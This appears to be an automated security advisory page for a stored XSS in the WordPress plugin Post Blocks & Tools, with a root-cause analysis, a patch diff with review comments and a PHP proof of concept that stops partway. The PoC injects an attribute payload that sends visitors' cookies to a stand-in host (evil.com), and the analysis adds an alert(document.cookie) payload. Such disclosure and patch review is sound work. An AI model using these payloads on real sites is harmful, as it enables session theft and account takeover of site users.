Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: April 18, 2026

CVE-2026-5711: Post Blocks & Tools <= 1.3.0 – Authenticated (Author+) Stored Cross-Site Scripting via 'sliderStyle' Block Attribute (bnm-blocks)

CVE ID: CVE-2026-5711
Plugin: bnm-blocks
Severity: Medium (CVSS 6.4)
CWE: 79
Vulnerable Version: 1.3.0
Patched Version: 1.3.1
Disclosed: April 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-5711:
The Post Blocks & Tools WordPress plugin, version 1.3.0 and earlier, contains an authenticated stored cross-site scripting (XSS) vulnerability in the Posts Slider block, reached through the 'sliderStyle' attribute. Attackers with author-level permissions or higher can inject arbitrary JavaScript that executes when users view pages containing the malicious block. The CVSS score of 6.4 reflects the authentication requirement and the impact on confidentiality and integrity.

Atomic Edge research identified the root cause as insufficient output escaping of user-controlled block attributes in the slider view template. The vulnerable code resides in /bnm-blocks/src/blocks/posts/slider/view.php; lines 34 and 213-235 show the issue. The plugin concatenates the unsanitized 'sliderStyle' attribute value directly into HTML class names (line 213) and data attributes (lines 235-236) without escaping, which allows JavaScript injection through crafted attribute values.

Exploitation requires an authenticated attacker with author privileges or higher. The attacker creates or edits a post using the Gutenberg editor, adds the Posts Slider block, and sets the 'sliderStyle' attribute to a malicious value containing JavaScript. For example, setting sliderStyle to 'style-1" onmouseover="alert(document.cookie)' would inject executable code. When any user views the compromised post, the malicious script executes in their browser context. The attack persists in the database as stored XSS.

The patch in version 1.3.1 addresses the vulnerability through multiple sanitization improvements. Key changes include applying sanitize_html_class() to the 'sliderStyle' attribute when constructing CSS class names (line 213). The patch also adds proper escaping with esc_attr() for data attributes (lines 235-239). Additionally, the fix introduces type casting for numeric attributes and moves variable declarations outside output blocks to prevent similar issues. These changes ensure user-supplied attributes are properly sanitized before inclusion in HTML output.
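As an added illustration (not the plugin's own code), the following stand-alone PHP models the two output sinks the patch changes, the 'bnm-sw-' class name and the data attributes, in their 1.3.0 and 1.3.1 shapes, and renders a constructed attribute value through both. The esc_attr(), sanitize_html_class() and get_block_wrapper_attributes() definitions are simplified stand-ins that are only used when WordPress is not loaded.

```php
<?php
// Added example, not plugin code: a minimal model of the slider view's two
// output sinks (the 'bnm-sw-…' class name and the data-* attributes) in their
// 1.3.0 and 1.3.1 shapes. When WordPress is not loaded, simplified stand-ins
// for esc_attr(), sanitize_html_class() and get_block_wrapper_attributes()
// are defined so the file runs from the command line.

if ( ! function_exists( 'esc_attr' ) ) {
	// Stand-in: WordPress's esc_attr() also normalises charsets and existing
	// entities; encoding quotes and angle brackets is the part that matters here.
	function esc_attr( $text ) {
		return htmlspecialchars( (string) $text, ENT_QUOTES, 'UTF-8' );
	}
}

if ( ! function_exists( 'sanitize_html_class' ) ) {
	// Stand-in: drop percent-encoded sequences, then everything outside
	// [A-Za-z0-9_-], mirroring WordPress's sanitize_html_class().
	function sanitize_html_class( $class, $fallback = '' ) {
		$sanitized = preg_replace( '/%[a-fA-F0-9]{2}/', '', (string) $class );
		$sanitized = preg_replace( '/[^A-Za-z0-9_-]/', '', $sanitized );
		return ( '' === $sanitized && '' !== $fallback ) ? $fallback : $sanitized;
	}
}

if ( ! function_exists( 'get_block_wrapper_attributes' ) ) {
	// Stand-in: emit key="escaped value" pairs, as core does for the class list.
	function get_block_wrapper_attributes( $extra = array() ) {
		$out = array();
		foreach ( $extra as $key => $value ) {
			$out[] = $key . '="' . esc_attr( $value ) . '"';
		}
		return implode( ' ', $out );
	}
}

// 1.3.0 shape: the class name is concatenated raw and the data attributes are
// emitted UNQUOTED, with a single esc_attr() over the whole joined string.
function render_slider_vulnerable( array $attributes ) {
	$slider_style = isset( $attributes['sliderStyle'] ) ? $attributes['sliderStyle'] : 'style-1';
	$classes      = array( 'wpbnmposw', 'bnmbcs', 'bnm-sw-' . $attributes['sliderStyle'] );
	$wrapper      = get_block_wrapper_attributes( array( 'class' => implode( ' ', $classes ) ) );
	$data         = array( 'data-slider-style=' . $slider_style );
	// A space in $slider_style ends the unquoted value; whatever follows is
	// parsed by the browser as a new attribute, and entity encoding does not
	// change that because a space needs no encoding.
	return sprintf( '<div %1$s %2$s>%3$s</div>', $wrapper, esc_attr( implode( ' ', $data ) ), '' );
}

// 1.3.1 shape: class names go through sanitize_html_class() and every data
// attribute value is quoted and escaped on its own, with no outer esc_attr().
function render_slider_patched( array $attributes ) {
	$slider_style = isset( $attributes['sliderStyle'] ) ? $attributes['sliderStyle'] : 'style-1';
	$classes      = array( 'wpbnmposw', 'bnmbcs', sanitize_html_class( 'bnm-sw-' . $slider_style ) );
	$wrapper      = get_block_wrapper_attributes( array( 'class' => implode( ' ', $classes ) ) );
	$data         = array( 'data-slider-style="' . esc_attr( $slider_style ) . '"' );
	return sprintf( '<div %1$s %2$s>%3$s</div>', $wrapper, implode( ' ', $data ), '' );
}

// Constructed test input: a benign value carrying the two characters that
// matter for this bug, a space and a double quote; no script is involved.
$constructed = array( 'sliderStyle' => 'style-1 data-injected="1' );

echo "1.3.0: ", render_slider_vulnerable( $constructed ), PHP_EOL;
echo "1.3.1: ", render_slider_patched( $constructed ), PHP_EOL;
```

Run it with the php CLI: the 1.3.0 line shows the space in the value producing a second attribute on the wrapper even though esc_attr() was applied to the joined string, while the 1.3.1 line keeps the whole value inside the quoted data-slider-style attribute and reduces the class name to safe characters.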

Successful exploitation allows attackers to execute arbitrary JavaScript in the context of authenticated users viewing affected pages. This can lead to session hijacking, administrative account takeover, content modification, or redirection to malicious sites. Since the vulnerability affects stored content, a single injection can compromise multiple users over time. The author-level access requirement limits immediate impact but aligns with typical contributor workflows in multi-author WordPress installations.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff
--- a/bnm-blocks/bnm-blocks.php
+++ b/bnm-blocks/bnm-blocks.php
@@ -4,7 +4,7 @@
  * Description:       Post grid, post list, and post slider Gutenberg blocks to design blog and magazine layouts easily.
  * Requires at least: 6.0
  * Requires PHP:      7.0
- * Version:           1.3.0
+ * Version:           1.3.1
  * Author:            ThemezHut
  * License:           GPL-2.0-or-later
  * License URI:       https://www.gnu.org/licenses/gpl-2.0.html
--- a/bnm-blocks/src/blocks/posts/featured-posts-1/view.php
+++ b/bnm-blocks/src/blocks/posts/featured-posts-1/view.php
@@ -26,17 +26,18 @@
 	$featured_image_slug = ! empty( $attributes['featuredImageSizeSlug'] ) ? $attributes['featuredImageSizeSlug'] : '';
 	$featured_image_slug_small = ! empty( $attributes['featuredImageSizeSlugSmall'] ) ? $attributes['featuredImageSizeSlugSmall'] : '';

+	$allowed_tags = bnmbt_get_allowed_header_tags();
+	$header_html_tag = isset( $attributes['headerHtmlTag'] ) && in_array( strtolower( $attributes['headerHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['headerHtmlTag'] ) : 'h2';
+
 	ob_start();

 	if ( '' !== $attributes['sectionHeader'] && true === $attributes['showSectionHeader'] ) {
-		echo "<div class="bnm-block-title-wrap">";
-			$allowed_tags = bnmbt_get_allowed_header_tags();
-			$tag = isset( $attributes['headerHtmlTag'] ) && in_array( strtolower( $attributes['headerHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['headerHtmlTag'] ) : 'h2';
-			echo "<". esc_attr($tag) ." class="article-section-title">";
+		echo "<div class="bnm-block-title-wrap">";
+			echo "<". esc_attr($header_html_tag) ." class="article-section-title">";
 				echo "<span>";
 					echo wp_kses_post( $attributes['sectionHeader'] );
 				echo "</span>";
-			echo "</".esc_attr($tag).">";
+			echo "</".esc_attr($header_html_tag).">";
 		echo "</div>";
 	}

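Review bot: the `echo "<div class="bnm-block-title-wrap">";` lines on both sides of this hunk are not valid PHP as rendered, because the inner double quotes inside a double-quoted string need `\"` (or the string should use single quotes); if the backslashes were dropped by the page rendering this is cosmetic, otherwise the file does not parse. Hoisting `$allowed_tags` and `$header_html_tag` above `ob_start()` is fine, and the `in_array( ..., true )` allowlist against `bnmbt_get_allowed_header_tags()` is the right shape for an element name, since escaping alone does not constrain which tag gets emitted.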
@@ -220,7 +221,7 @@
 	}

 	if ( $attributes['sectionHeaderStyle'] ) {
-		$classes[] = 'bnm-bhs-' . $attributes['sectionHeaderStyle'];
+		$classes[] = sanitize_html_class( 'bnm-bhs-' . $attributes['sectionHeaderStyle'] );
 	}

 	$wrapper_attributes = get_block_wrapper_attributes( array(
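Review bot: `sanitize_html_class()` strips disallowed characters rather than rejecting the value, so a malformed `sectionHeaderStyle` is silently coerced into some class name instead of falling back to a default. Because the block ships a fixed set of header styles, an allowlist check with a default fallback would be stricter and easier to reason about; the same one-line change is repeated for `sectionHeaderStyle` in every other view file in this patch, so a small shared helper would avoid six copies.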
--- a/bnm-blocks/src/blocks/posts/featured-posts-2/view.php
+++ b/bnm-blocks/src/blocks/posts/featured-posts-2/view.php
@@ -217,7 +217,7 @@
 	}

 	if ( $attributes['sectionHeaderStyle'] ) {
-		$classes[] = 'bnm-bhs-' . $attributes['sectionHeaderStyle'];
+		$classes[] = sanitize_html_class( 'bnm-bhs-' . $attributes['sectionHeaderStyle'] );
 	}

 	$wrapper_attributes = get_block_wrapper_attributes( array(
--- a/bnm-blocks/src/blocks/posts/post-block-1/view.php
+++ b/bnm-blocks/src/blocks/posts/post-block-1/view.php
@@ -27,17 +27,19 @@
 	$featured_image_slug = ! empty( $attributes['featuredImageSizeSlug'] ) ? $attributes['featuredImageSizeSlug'] : 'bnm-featured';
 	$featured_image_slug_small = ! empty( $attributes['featuredImageSizeSlugSmall'] ) ? $attributes['featuredImageSizeSlugSmall'] : 'bnm-featured-thumb';

+	$allowed_tags = bnmbt_get_allowed_header_tags();
+	$header_html_tag = isset( $attributes['headerHtmlTag'] ) && in_array( strtolower( $attributes['headerHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['headerHtmlTag'] ) : 'h2';
+	$title_html_tag = isset( $attributes['titleHtmlTag'] ) && in_array( strtolower( $attributes['titleHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['titleHtmlTag'] ) : 'h3';
+
 	ob_start();

 	if ( '' !== $attributes['sectionHeader'] && true === $attributes['showSectionHeader'] ) {
-		echo "<div class="bnm-block-title-wrap">";
-			$allowed_tags = bnmbt_get_allowed_header_tags();
-			$tag = isset( $attributes['headerHtmlTag'] ) && in_array( strtolower( $attributes['headerHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['headerHtmlTag'] ) : 'h2';
-			echo "<". esc_attr($tag) ." class="article-section-title">";
+		echo "<div class="bnm-block-title-wrap">";
+			echo "<". esc_attr($header_html_tag) ." class="article-section-title">";
 				echo "<span>";
 					echo wp_kses_post( $attributes['sectionHeader'] );
 				echo "</span>";
-			echo "</".esc_attr($tag).">";
+			echo "</".esc_attr($header_html_tag).">";
 		echo "</div>";
 	}

@@ -75,16 +77,14 @@

 								<?php
 									if ( $attributes['showTitle'] ) {
-									$allowed_tags = bnmbt_get_allowed_header_tags();
-									$tag = isset( $attributes['titleHtmlTag'] ) && in_array( strtolower( $attributes['titleHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['titleHtmlTag'] ) : 'h3';
-									echo "<". esc_attr($tag) ." class="entry-title">";
+									echo "<". esc_attr($title_html_tag) ." class="entry-title">";
 										?>
 											<a href="<?php echo esc_url( get_permalink() ); ?>" rel="bookmark">
 												<?php the_title(); ?>
 											</a>

 									<?php
-										echo "</".esc_attr($tag).">";
+										echo "</".esc_attr($title_html_tag).">";
 									}
 								?>

@@ -149,16 +149,14 @@

 							<?php
 								if ( $attributes['showTitle'] ) {
-									$allowed_tags = bnmbt_get_allowed_header_tags();
-									$tag = isset( $attributes['titleHtmlTag'] ) && in_array( strtolower( $attributes['titleHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['titleHtmlTag'] ) : 'h3';
-									echo "<". esc_attr($tag) ." class="entry-title">";
+									echo "<". esc_attr($title_html_tag) ." class="entry-title">";
 									?>
 										<a href="<?php echo esc_url( get_permalink() ); ?>" rel="bookmark">
 											<?php the_title(); ?>
 										</a>

 								<?php
-									echo "</".esc_attr($tag).">";
+									echo "</".esc_attr($title_html_tag).">";
 								}
 							?>

@@ -236,7 +234,7 @@
 	}

 	if ( $attributes['sectionHeaderStyle'] ) {
-		$classes[] = 'bnm-bhs-' . $attributes['sectionHeaderStyle'];
+		$classes[] = sanitize_html_class( 'bnm-bhs-' . $attributes['sectionHeaderStyle'] );
 	}

 	$wrapper_attributes = get_block_wrapper_attributes( array(
--- a/bnm-blocks/src/blocks/posts/post-block-2/view.php
+++ b/bnm-blocks/src/blocks/posts/post-block-2/view.php
@@ -27,20 +27,21 @@
 	$featured_image_slug = ! empty( $attributes['featuredImageSizeSlug'] ) ? $attributes['featuredImageSizeSlug'] : 'bnm-featured';
 	$featured_image_slug_small = ! empty( $attributes['featuredImageSizeSlugSmall'] ) ? $attributes['featuredImageSizeSlugSmall'] : 'bnm-featured-thumb';

+	$allowed_tags = bnmbt_get_allowed_header_tags();
+	$header_html_tag = isset( $attributes['headerHtmlTag'] ) && in_array( strtolower( $attributes['headerHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['headerHtmlTag'] ) : 'h2';
+
 	ob_start();
 	?>
 	<div class="posts-block-2-container">

 	<?php
 		if ( '' !== $attributes['sectionHeader'] && true === $attributes['showSectionHeader'] ) {
-			echo "<div class="bnm-block-title-wrap">";
-				$allowed_tags = bnmbt_get_allowed_header_tags();
-				$tag = isset( $attributes['headerHtmlTag'] ) && in_array( strtolower( $attributes['headerHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['headerHtmlTag'] ) : 'h2';
-				echo "<". esc_attr($tag) ." class="article-section-title">";
+			echo "<div class="bnm-block-title-wrap">";
+				echo "<". esc_attr($header_html_tag) ." class="article-section-title">";
 					echo "<span>";
 						echo wp_kses_post( $attributes['sectionHeader'] );
 					echo "</span>";
-				echo "</".esc_attr($tag).">";
+				echo "</".esc_attr($header_html_tag).">";
 			echo "</div>";
 		}
 	?>
@@ -212,7 +213,7 @@
 	}

 	if ( $attributes['sectionHeaderStyle'] ) {
-		$classes[] = 'bnm-bhs-' . $attributes['sectionHeaderStyle'];
+		$classes[] = sanitize_html_class( 'bnm-bhs-' . $attributes['sectionHeaderStyle'] );
 	}

 	$wrapper_attributes = get_block_wrapper_attributes( array(
--- a/bnm-blocks/src/blocks/posts/posts-ultra/view.php
+++ b/bnm-blocks/src/blocks/posts/posts-ultra/view.php
@@ -23,6 +23,14 @@

 	$article_query = new WP_Query( $post_query_args );

+	$show_featured_image = $attributes[ 'showFeaturedImage' ];
+	$image_position = $attributes[ 'imagePosition' ];
+	$image_min_height = isset( $attributes[ 'imageMinHeight' ] ) ? (float) $attributes[ 'imageMinHeight' ] : 0;
+
+	$allowed_tags = bnmbt_get_allowed_header_tags();
+	$title_html_tag = isset( $attributes['titleHtmlTag'] ) && in_array( strtolower( $attributes['titleHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['titleHtmlTag'] ) : 'h3';
+	$header_html_tag = isset( $attributes['headerHtmlTag'] ) && in_array( strtolower( $attributes['headerHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['headerHtmlTag'] ) : 'h2';
+
 	ob_start();
 	?>

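Review bot: `$show_featured_image` and `$image_position` (the first two added lines) read `$attributes[...]` without the `isset()` guard that the neighbouring `$image_min_height` line has, so a block saved without those attributes raises an undefined-index warning; guard them the same way, e.g. `$image_position = isset( $attributes['imagePosition'] ) ? $attributes['imagePosition'] : '';`. The `(float)` cast on `imageMinHeight` is the important change here: that value is interpolated into an inline `style` attribute further down, and the cast guarantees only a number reaches it.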
@@ -30,14 +38,12 @@

 	<?php
 		if ( '' !== $attributes['sectionHeader'] && true === $attributes['showSectionHeader'] ) {
-			echo "<div class="bnm-block-title-wrap">";
-				$allowed_tags = bnmbt_get_allowed_header_tags();
-				$tag = isset( $attributes['headerHtmlTag'] ) && in_array( strtolower( $attributes['headerHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['headerHtmlTag'] ) : 'h2';
-				echo "<". esc_attr($tag) ." class="article-section-title">";
+			echo "<div class="bnm-block-title-wrap">";
+				echo "<". esc_attr($header_html_tag) ." class="article-section-title">";
 					echo "<span>";
 						echo wp_kses_post( $attributes['sectionHeader'] );
 					echo "</span>";
-				echo "</".esc_attr($tag).">";
+				echo "</".esc_attr($header_html_tag).">";
 			echo "</div>";
 		}

@@ -50,7 +56,6 @@
 				$post_classes = 'bnmsp-post';

 				$has_post_thumbnail = has_post_thumbnail();
-				$show_featured_image = $attributes[ 'showFeaturedImage' ];

 				if ( $show_featured_image && $has_post_thumbnail ) {
 					$post_classes .= ' post-has-image';
@@ -58,13 +63,9 @@

 				$article_styles = '';

-				if ( "behind" === $attributes[ 'imagePosition' ] && $show_featured_image && $has_post_thumbnail ) {
-					$article_styles .= "min-height: ". $attributes[ 'imageMinHeight' ] ."vh;";
-				}
-
-				if ( "behind" === $attributes[ 'imagePosition' ] && $show_featured_image && $has_post_thumbnail ) {
-					$padding_top = $attributes[ 'imageMinHeight' ] / 5;
-					$article_styles .= " padding-top: ". $padding_top ."vh;";
+				if ( "behind" === $image_position && $show_featured_image && $has_post_thumbnail ) {
+					$article_styles .= "min-height: {$image_min_height}vh;";
+					$article_styles .= "padding-top: " . ( $image_min_height / 5 ) . "vh;";
 				}

 				?>
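Review bot: merging the two identical `if` blocks is correct, and the cast applied in the hoisted `$image_min_height` removes the raw interpolation of `imageMinHeight` into `$article_styles`. Two small behavioural notes for the changelog: the leading space before `padding-top:` was dropped in the merge (harmless CSS), and when `imageMinHeight` is absent the old code emitted `min-height: vh;` whereas the new code emits `min-height: 0vh;` and `padding-top: 0vh;`.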
@@ -87,17 +88,15 @@
 						<?php } ?>

 						<?php
-							if ( $attributes['showTitle'] ) {
-								$allowed_tags = bnmbt_get_allowed_header_tags();
-								$tag = isset( $attributes['titleHtmlTag'] ) && in_array( strtolower( $attributes['titleHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['titleHtmlTag'] ) : 'h3';
-								echo "<". esc_attr($tag) ." class="entry-title">";
+							if ( $attributes['showTitle'] ) {
+								echo "<". esc_attr($title_html_tag) ." class="entry-title">";
 								?>
 									<a href="<?php echo esc_url( get_permalink() ); ?>" rel="bookmark">
 										<?php the_title(); ?>
 									</a>

 							<?php
-								echo "</".esc_attr($tag).">";
+								echo "</".esc_attr($title_html_tag).">";
 							}
 						?>

@@ -171,15 +170,15 @@
 	}

 	if ( isset( $attributes['columns'] ) && 'grid' === $attributes['postLayout'] ) {
-		$classes[] = 'columns-' . $attributes['columns'];
+		$classes[] = sanitize_html_class( 'columns-' . $attributes['columns'] );
 	}

-	if ( $attributes['showFeaturedImage'] && isset( $attributes['imagePosition'] ) ) {
-		$classes[] = 'image-align' . $attributes['imagePosition'];
+	if ( $show_featured_image && isset( $image_position ) ) {
+		$classes[] = sanitize_html_class( 'image-align' . $image_position );
 	}

 	if ( $attributes['textAlign'] ) {
-		$classes[] = 'has-text-align' . $attributes['textAlign'];
+		$classes[] = sanitize_html_class( 'has-text-align' . $attributes['textAlign'] );
 	}

 	if ( "33%" !== $attributes['featuredImageWidth'] || "67%" !== $attributes['entryContentWidth'] ) {
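Review bot: `isset( $image_position )` on a local variable that is assigned unconditionally earlier in the file is always true unless the attribute was literally null, so the condition now effectively reduces to `$show_featured_image`; either keep the original `isset( $attributes['imagePosition'] )` or guard the assignment and compare against `''` here. Wrapping the `columns-`, `image-align` and `has-text-align` classes in `sanitize_html_class()` is consistent with the rest of the patch.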
@@ -191,7 +190,7 @@
 	}

 	if ( $attributes['sectionHeaderStyle'] ) {
-		$classes[] = 'bnm-bhs-' . $attributes['sectionHeaderStyle'];
+		$classes[] = sanitize_html_class( 'bnm-bhs-' . $attributes['sectionHeaderStyle'] );
 	}

 	if ( ! empty( $attributes['featuredImageMargin'] ) ) {
--- a/bnm-blocks/src/blocks/posts/slider/view.php
+++ b/bnm-blocks/src/blocks/posts/slider/view.php
@@ -34,28 +34,30 @@
 	$article_query = new WP_Query( $post_query_args );

 	$slider_style = isset( $attributes['sliderStyle'] ) ? $attributes['sliderStyle'] : 'style-1';
-	$slides_per_view = isset( $attributes['slidesPerView'] ) ? $attributes['slidesPerView'] : 1;
-	$asepec_ratio = isset( $attributes['aspectRatio'] ) ? $attributes['aspectRatio'] : 0.5625;
-	$space_between_slides = isset( $attributes['spaceBetweenSlides'] ) ? $attributes['spaceBetweenSlides'] : 20;
-	$autoplay = isset( $attributes['autoplay'] ) ? $attributes['autoplay'] : false;
+	$slides_per_view = isset( $attributes['slidesPerView'] ) ? (int) $attributes['slidesPerView'] : 1;
+	$asepect_ratio = isset( $attributes['aspectRatio'] ) ? (float) $attributes['aspectRatio'] : 0.5625;
+	$space_between_slides = isset( $attributes['spaceBetweenSlides'] ) ? (int) $attributes['spaceBetweenSlides'] : 20;
+	$autoplay = isset( $attributes['autoplay'] ) ? (bool) $attributes['autoplay'] : false;
 	$delay    = isset( $attributes['delay'] ) ? absint( $attributes['delay'] ) : 5;
 	$featured_image_slug = ! empty( $attributes['featuredImageSizeSlug'] ) ? $attributes['featuredImageSizeSlug'] : '';
 	$slider_thumb_size = ! empty( $attributes['slideThumbSize'] ) ? $attributes['slideThumbSize'] : '';
 	$image_fit = ! empty( $attributes['imageFit'] ) ? $attributes['imageFit'] : 'cover';
-	$thumbSlidesPerView = isset( $attributes['thumbSlidesPerView'] ) ? $attributes['thumbSlidesPerView'] : 5;
-	$slide_image_class = "image-fit-{$image_fit}";
+	$thumbSlidesPerView = isset( $attributes['thumbSlidesPerView'] ) ? (int) $attributes['thumbSlidesPerView'] : 5;
+	$slide_image_class = sanitize_html_class( 'image-fit-'. $image_fit );
+
+	$allowed_tags = bnmbt_get_allowed_header_tags();
+	$header_html_tag = isset( $attributes['headerHtmlTag'] ) && in_array( strtolower( $attributes['headerHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['headerHtmlTag'] ) : 'h2';
+	$title_html_tag = isset( $attributes['titleHtmlTag'] ) && in_array( strtolower( $attributes['titleHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['titleHtmlTag'] ) : 'h3';

 	ob_start();

 	if ( '' !== $attributes['sectionHeader'] && true === $attributes['showSectionHeader'] ) {
-		echo "<div class="bnm-block-title-wrap">";
-			$allowed_tags = bnmbt_get_allowed_header_tags();
-			$tag = isset( $attributes['headerHtmlTag'] ) && in_array( strtolower( $attributes['headerHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['headerHtmlTag'] ) : 'h2';
-			echo "<". esc_attr($tag) ." class="article-section-title">";
+		echo "<div class="bnm-block-title-wrap">";
+			echo "<". esc_attr($header_html_tag) ." class="article-section-title">";
 				echo "<span>";
 					echo wp_kses_post( $attributes['sectionHeader'] );
 				echo "</span>";
-			echo "</".esc_attr($tag).">";
+			echo "</".esc_attr($header_html_tag).">";
 		echo "</div>";
 	}

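Review bot: `$slider_style` (the unchanged line at the top of the hunk) is still taken verbatim from `$attributes['sliderStyle']`; it is now escaped at each sink below, but since the template only knows a handful of styles (it compares against `'style-4'` in a later hunk), validating it here against that set and falling back to `'style-1'` would keep an unexpected value out of the class name and the data attribute altogether. The `(int)`, `(float)` and `(bool)` casts on the numeric and boolean attributes are good; the renamed `$asepect_ratio` is still misspelled (`$aspect_ratio`) and must stay in sync with its use in the `data-aspect-ratio` hunk further down, which it does.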
@@ -101,17 +103,15 @@
 									</div>
 								<?php endif; ?>

-								<?php  if ( $attributes['showTitle'] ) {
-									$allowed_tags = bnmbt_get_allowed_header_tags();
-									$tag = isset( $attributes['titleHtmlTag'] ) && in_array( strtolower( $attributes['titleHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['titleHtmlTag'] ) : 'h3';
-									echo "<". esc_attr($tag) ." class="entry-title">";
+								<?php  if ( $attributes['showTitle'] ) {
+									echo "<". esc_attr($title_html_tag) ." class="entry-title">";
 									?>
 										<a href="<?php echo esc_url( get_permalink() ); ?>" rel="bookmark">
 											<?php the_title(); ?>
 										</a>

 								<?php
-									echo "</".esc_attr($tag).">";
+									echo "</".esc_attr($title_html_tag).">";
 								}
 								?>

@@ -165,7 +165,7 @@

 	</div><!-- .bnm-slider-wrapper -->

-	<?php if ( $attributes['sliderStyle'] === 'style-4' ) : ?>
+	<?php if ( $slider_style === 'style-4' ) : ?>
 		<div thumbsSlider="" class="bnm-thumbnail-swiper swiper">
 			<div class="swiper-wrapper">
 			<?php
@@ -213,7 +213,7 @@
 	$slider_block = ob_get_clean();

 	// Slider style class name.
-	$slider_style_class = 'bnm-sw-' . $attributes['sliderStyle'];
+	$slider_style_class = sanitize_html_class( 'bnm-sw-' . $slider_style );

 	$classes = array( 'wpbnmposw', 'bnmbcs', $slider_style_class );

@@ -222,7 +222,7 @@
 	}

 	if ( $attributes['sectionHeaderStyle'] ) {
-		$classes[] = 'bnm-bhs-' . $attributes['sectionHeaderStyle'];
+		$classes[] = sanitize_html_class( 'bnm-bhs-' . $attributes['sectionHeaderStyle'] );
 	}

 	$css = new Post_Slider_1_CSS();
@@ -235,21 +235,24 @@

 	$data_attributes = [
 		//'data-current-post-id=' . $post_id,
-		'data-slider-style=' . $slider_style,
-		'data-aspect-ratio=' . $asepec_ratio,
-		'data-slides-per-view=' . $slides_per_view,
-		'data-space-between-slides=' . $space_between_slides,
-		'data-thumb-slides-per-view=' . $thumbSlidesPerView
+		'data-slider-style="' . esc_attr( $slider_style ) . '"',
+		'data-aspect-ratio="' . esc_attr( $asepect_ratio ) . '"',
+		'data-slides-per-view="' . esc_attr( $slides_per_view ) . '"',
+		'data-space-between-slides="' . esc_attr( $space_between_slides ) . '"',
+		'data-thumb-slides-per-view="' . esc_attr( $thumbSlidesPerView ) . '"'
 	];

 	if ( $autoplay ) {
-		$data_attributes[] = 'data-autoplay=1';
-		$data_attributes[] = sprintf( 'data-autoplay_delay=%s', esc_attr( $delay ) );
+		$data_attributes[] = 'data-autoplay="1"';
+		$data_attributes[] = sprintf(
+			'data-autoplay_delay="%s"',
+			esc_attr( $delay )
+		);
 	}

 	return sprintf( '<div %1$s %2$s>%3$s</div>',
 		$wrapper_attributes,
-		esc_attr( implode( ' ', $data_attributes ) ),
+		implode( ' ', $data_attributes ),
 		$slider_block
 	);
 }
 No newline at end of file
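Review bot: quoting each value (`data-slider-style="..."`) and escaping it individually is the actual fix in this hunk, and dropping the outer `esc_attr( implode( ' ', $data_attributes ) )` is required rather than optional. The old call did encode `"` in the joined string, but because the values were emitted unquoted a single space was enough to end the value and start a new attribute, which entity encoding does not touch; keeping the outer call on the new quoted form would turn every `"` into `&quot;` and break the markup. `esc_attr()` on the already cast integers and floats is redundant but harmless.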

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-5711 - Post Blocks & Tools <= 1.3.0 - Authenticated (Author+) Stored Cross-Site Scripting via 'sliderStyle' Block Attribute

$target_url = 'https://vulnerable-site.com/wp-admin/post.php';
$username = 'attacker_author';
$password = 'author_password';
$post_id = 123; // Target post ID to edit

// Malicious sliderStyle attribute payload
// This injects an onmouseover handler that steals cookies
$malicious_slider_style = 'style-1" onmouseover="fetch(\'https://evil.com/steal?c=\'+document.cookie)';

// WordPress REST API endpoint for block updates
$rest_url = $target_url . '?rest_route=/wp/v2/posts/' . $post_id;

// First, authenticate and get nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '?rest_route=/wp/v2/users/me');
curl_setopt($ch, CURLOPT_USERPWD, $username . ':' . $password);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);

if (curl_getinfo($ch, CURLINFO_HTTP_CODE) !== 200) {
    echo "Authentication failed. Check credentials.\n";
    exit;
}

// Get current post content to preserve existing blocks
curl_setopt($ch, CURLOPT_URL, $rest_url);
curl_setopt($ch, CURLOPT_HTTPGET, true);
$post_data = json_decode(curl_exec($ch), true);

if (!isset($post_data['content']['raw'])) {
    echo "Failed to retrieve post content.\n";
    exit;
}

// Parse blocks and inject malicious sliderStyle attribute
$content = $post_data['content']['raw'];

// Find Posts Slider block and modify sliderStyle attribute
// This regex identifies the slider block and replaces the sliderStyle value
$pattern = '/(<!-- wp:bnm-blocks\/posts-slider.*?"sliderStyle":")([^"]*)(".*?-->)/s';
$replacement = '${1}' . $malicious_slider_style . '${3}';
$modified_content = preg_replace($pattern, $replacement, $content);

// If no existing slider block found, add a new malicious block
if ($modified_content === $content) {
